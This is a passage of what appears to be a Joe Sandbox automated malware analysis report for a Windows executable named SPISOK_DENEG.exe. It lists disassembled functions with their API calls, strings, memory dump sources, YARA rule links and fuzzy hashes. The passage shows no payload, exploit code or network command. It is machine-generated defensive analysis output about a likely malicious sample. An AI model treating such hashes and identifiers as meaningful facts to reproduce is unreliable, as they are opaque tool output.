                                                            Function 000F7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SPISOK_DENEG.exe,00000104), ref: 000F7FAE
                                                            • _free.LIBCMT ref: 000F8079
                                                            • _free.LIBCMT ref: 000F8083
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Users\user\Desktop\SPISOK_DENEG.exe
                                                            • API String ID: 2506810119-65320021
                                                            • Opcode ID: ab59fdf1ae0ade54007996a506dc3b770eb77059f95bbf7893b65cbae8085496
                                                            • Instruction ID: e72b05ca5945964f270db0f26f6575034c578a117512d02573b1747ab2bd47b7
                                                            • Opcode Fuzzy Hash: ab59fdf1ae0ade54007996a506dc3b770eb77059f95bbf7893b65cbae8085496
                                                            • Instruction Fuzzy Hash: 0E31A0B1A0021DAFDB61EF95DC819EEBBFCEF85310F508066FA0497611DB708A84EB51
                                                            Function 000F31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 000F31FB
                                                            • _abort.LIBCMT ref: 000F3306
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: EncodePointer_abort
                                                            • String ID: MOC$RCC
                                                            • API String ID: 948111806-2084237596
                                                            • Opcode ID: a1b91c2dfeb1fc6ae3340ae8c8f7f1d9d320fc73e4d8824727a654228fdbf97e
                                                            • Instruction ID: a782a20e7c823a8a8f69246beb624b6bd00b22459a976249aab400e0d49dba32
                                                            • Opcode Fuzzy Hash: a1b91c2dfeb1fc6ae3340ae8c8f7f1d9d320fc73e4d8824727a654228fdbf97e
                                                            • Instruction Fuzzy Hash: AB41487190020DAFCF55DF98CD81AEEBBB5BF48314F198059FA04A7612D735AA90EB50
                                                            Function 000D7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D7406
                                                              • Part of subcall function 000D3BBA: __EH_prolog.LIBCMT ref: 000D3BBF
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 000D74CD
                                                              • Part of subcall function 000D7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 000D7AAB
                                                              • Part of subcall function 000D7A9C: GetLastError.KERNEL32 ref: 000D7AF1
                                                              • Part of subcall function 000D7A9C: CloseHandle.KERNEL32(?), ref: 000D7B00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                            • API String ID: 3813983858-639343689
                                                            • Opcode ID: a5023aa32c29673f50a70cbfc53fb5a2a657721e96573070fc106e1a829d5721
                                                            • Instruction ID: 7258037359d56cc2b002b83861cfef49d77ad4c4cf8512e1dbc60b2fc3c72a69
                                                            • Opcode Fuzzy Hash: a5023aa32c29673f50a70cbfc53fb5a2a657721e96573070fc106e1a829d5721
                                                            • Instruction Fuzzy Hash: 3531A171E04348AADF51EBA4DC45BEEBBA9AF49300F044017F549A7386E7B48A84CB71
                                                            Function 000EAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000D1316: GetDlgItem.USER32(00000000,00003021), ref: 000D135A
                                                              • Part of subcall function 000D1316: SetWindowTextW.USER32(00000000,001035F4), ref: 000D1370
                                                            • EndDialog.USER32(?,00000001), ref: 000EAD98
                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 000EADAD
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 000EADC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: ASKNEXTVOL
                                                            • API String ID: 445417207-3402441367
                                                            • Opcode ID: f7ae87cc08f0614dd529f388b3d94d34cf4f3ac58c14cea650c5cd6ca8ea3632
                                                            • Instruction ID: fc451227813db2161c177fa9a834acce54327ce38c266e325ce538cefd7a8fb9
                                                            • Opcode Fuzzy Hash: f7ae87cc08f0614dd529f388b3d94d34cf4f3ac58c14cea650c5cd6ca8ea3632
                                                            • Instruction Fuzzy Hash: 3111B132348240BFD3619F69DC05FAA77A9BB4F742F000001F242EA9A1CB61A955D726
                                                            Function 000DD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __fprintf_l.LIBCMT ref: 000DD954
                                                            • _strncpy.LIBCMT ref: 000DD99A
                                                              • Part of subcall function 000E1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00111030,00000200,000DD928,00000000,?,00000050,00111030), ref: 000E1DC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                            • String ID: $%s$@%s
                                                            • API String ID: 562999700-834177443
                                                            • Opcode ID: adee5c02a4176c69eb22ddb1be9d9782c1b6b44c5bbb05905401be45e46b185f
                                                            • Instruction ID: 6bc9ba188231ca44cacaa6d06ac511c6deff3663c43b35c9dc69912a93624fcd
                                                            • Opcode Fuzzy Hash: adee5c02a4176c69eb22ddb1be9d9782c1b6b44c5bbb05905401be45e46b185f
                                                            • Instruction Fuzzy Hash: 1E21727254034CEEDB21EEA4CC05FEEBBE8AF05704F044513FA50962A2E3B2D649DB61
                                                            Function 000E0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,000DAC5A,00000008,?,00000000,?,000DD22D,?,00000000), ref: 000E0E85
                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,000DAC5A,00000008,?,00000000,?,000DD22D,?,00000000), ref: 000E0E8F
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,000DAC5A,00000008,?,00000000,?,000DD22D,?,00000000), ref: 000E0E9F
                                                            Strings
                                                            • Thread pool initialization failed., xrefs: 000E0EB7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                            • String ID: Thread pool initialization failed.
                                                            • API String ID: 3340455307-2182114853
                                                            • Opcode ID: 45d5eee93cc1495a5cbf1697b5e198e7a65821f519c23e3be973bdc3d0476299
                                                            • Instruction ID: cb711c140f3b34ab5e5e7ef0e1fc0139c86f2d3738bcbd65dcfca66ce5c484b4
                                                            • Opcode Fuzzy Hash: 45d5eee93cc1495a5cbf1697b5e198e7a65821f519c23e3be973bdc3d0476299
                                                            • Instruction Fuzzy Hash: E31151B16407089FD3315F769C849A7FBECEB69744F14483EF1DAD6301D6B159808B60
                                                            Function 000EB270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000D1316: GetDlgItem.USER32(00000000,00003021), ref: 000D135A
                                                              • Part of subcall function 000D1316: SetWindowTextW.USER32(00000000,001035F4), ref: 000D1370
                                                            • EndDialog.USER32(?,00000001), ref: 000EB2BE
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 000EB2D6
                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 000EB304
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: GETPASSWORD1
                                                            • API String ID: 445417207-3292211884
                                                            • Opcode ID: 6c5cf73b62e0ee9e6bee355a562d88b4f50b86eda716df7199cbfa7e52c26405
                                                            • Instruction ID: 663c9cb9cf80c5bdb8f08a09bd4ff23b98a5c0d51ef5ee07a026c8dbbdbad8a3
                                                            • Opcode Fuzzy Hash: 6c5cf73b62e0ee9e6bee355a562d88b4f50b86eda716df7199cbfa7e52c26405
                                                            • Instruction Fuzzy Hash: 9A110432900259BADB21AE75AD4AFFF37ACEF09700F000025FB46B21C0C7A0DA4087B1
                                                            Function 000EDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                            • API String ID: 0-56093855
                                                            • Opcode ID: 7fd7e979435679324fdf426b9f24fe1bf7dcd47d224f5f719d9dbbe10eb59432
                                                            • Instruction ID: c6676ba19307ad1cc90f9217ab8b76c61f02eae10dbd3b5a23a832e5270305d4
                                                            • Opcode Fuzzy Hash: 7fd7e979435679324fdf426b9f24fe1bf7dcd47d224f5f719d9dbbe10eb59432
                                                            • Instruction Fuzzy Hash: 9C01B575508285AFD7258F9AFD44ADA7BE5F708354B108026F515E3A30CB3188D0DBA0
                                                            Function 000F9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                            • Instruction ID: 803507f3dc6044358b7b70db5f5662649a62b76441929bc979359ef47f8c34fa
                                                            • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                            • Instruction Fuzzy Hash: C6A16A7290438E9FEB25CF28C8917BEBBE5EF55310F28416DE6859B682C3398D41D790
                                                            Function 000DA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,000D7F69,?,?,?), ref: 000DA3FA
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,000D7F69,?), ref: 000DA43E
                                                            • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,000D7F69,?,?,?,?,?,?,?), ref: 000DA4BF
                                                            • CloseHandle.KERNEL32(?,?,?,00000800,?,000D7F69,?,?,?,?,?,?,?,?,?,?), ref: 000DA4C6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: File$Create$CloseHandleTime
                                                            • String ID:
                                                            • API String ID: 2287278272-0
                                                            • Opcode ID: e591d5318c2b42326848a7bd5ae8932fdd2a21010635c84bfa72474f08fb2798
                                                            • Instruction ID: 21e6c13a6f04cfc0c316ad08066c9d51a37981c8fe96136c2d7aa8b8cff5cec2
                                                            • Opcode Fuzzy Hash: e591d5318c2b42326848a7bd5ae8932fdd2a21010635c84bfa72474f08fb2798
                                                            • Instruction Fuzzy Hash: 044190312483819AD731DF24DC45FEEBBE9AB86700F04091EB5E1932D1D6B49B48DB63
                                                            Function 000D1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID:
                                                            • API String ID: 176396367-0
                                                            • Opcode ID: 90415018f5960bc729b78ad33791624f4878325d309edfa484339c5e9e1d1502
                                                            • Instruction ID: 92059de2101601949f3ef40b8f1fcba899086ac793762172ec7e0232517fec32
                                                            • Opcode Fuzzy Hash: 90415018f5960bc729b78ad33791624f4878325d309edfa484339c5e9e1d1502
                                                            • Instruction Fuzzy Hash: 1F41A771A006695FCB25AF688C459EF7BB8EF15310F00001AFD55F7246DF70AE958BA4
                                                            Function 000FC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,000F91E0,?,00000000,?,00000001,?,?,00000001,000F91E0,?), ref: 000FC9D5
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000FCA5E
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,000F6CBE,?), ref: 000FCA70
                                                            • __freea.LIBCMT ref: 000FCA79
                                                              • Part of subcall function 000F8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,000FCA2C,00000000,?,000F6CBE,?,00000008,?,000F91E0,?,?,?), ref: 000F8E38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: d8f8adeff5d00526866bf65bcf0f7d1a0fa81b7d27420714d839d4e9abd09f1a
                                                            • Instruction ID: f5d723cced883b4458d76f94a33035644ae3922ac929e8a6103fd00da8e90dd6
                                                            • Opcode Fuzzy Hash: d8f8adeff5d00526866bf65bcf0f7d1a0fa81b7d27420714d839d4e9abd09f1a
                                                            • Instruction Fuzzy Hash: 9431CD72A0020EABEB24CF64CC46DFE7BA5EF41314B044268FD04E6691EB35DD90EB91
                                                            Function 000EA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 000EA666
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 000EA675
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000EA683
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 000EA691
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 5fe2c2669a485137729d76da1a590c8ae2e6fa1c7b09a433d7a1abc33db6464c
                                                            • Instruction ID: 501e14368fda0022e118bd63752abcf3f9673eb160978c3508ef362e5b322275
                                                            • Opcode Fuzzy Hash: 5fe2c2669a485137729d76da1a590c8ae2e6fa1c7b09a433d7a1abc33db6464c
                                                            • Instruction Fuzzy Hash: 41E0C231946731BBC3681B60BC0DBCB3F54AB06B53F008100FA15AA9D0DF7486848FA4
                                                            Function 000EA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000EA699: GetDC.USER32(00000000), ref: 000EA69D
                                                              • Part of subcall function 000EA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 000EA6A8
                                                              • Part of subcall function 000EA699: ReleaseDC.USER32(00000000,00000000), ref: 000EA6B3
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 000EA83C
                                                              • Part of subcall function 000EAAC9: GetDC.USER32(00000000), ref: 000EAAD2
                                                              • Part of subcall function 000EAAC9: GetObjectW.GDI32(?,00000018,?), ref: 000EAB01
                                                              • Part of subcall function 000EAAC9: ReleaseDC.USER32(00000000,?), ref: 000EAB99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ObjectRelease$CapsDevice
                                                            • String ID: (
                                                            • API String ID: 1061551593-3887548279
                                                            • Opcode ID: db4a2b37d9de43b7c0d5b8b007705051098ff7ca204658e79ae1b89fa6e67738
                                                            • Instruction ID: 2f2ef0440b7bfb5ed4a12a1deec1cf4074bbf6177dc57b5e253cd6c03f95aa3e
                                                            • Opcode Fuzzy Hash: db4a2b37d9de43b7c0d5b8b007705051098ff7ca204658e79ae1b89fa6e67738
                                                            • Instruction Fuzzy Hash: 7291F071608394AFD721DF25C848A2BBBE9FFC9700F00491EF59AD3260DB71A945CB62
                                                            Function 000D75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D75E3
                                                              • Part of subcall function 000E05DA: _wcslen.LIBCMT ref: 000E05E0
                                                              • Part of subcall function 000DA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 000DA598
                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000D777F
                                                              • Part of subcall function 000DA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,000DA325,?,?,?,000DA175,?,00000001,00000000,?,?), ref: 000DA501
                                                              • Part of subcall function 000DA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000DA325,?,?,?,000DA175,?,00000001,00000000,?,?), ref: 000DA532
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
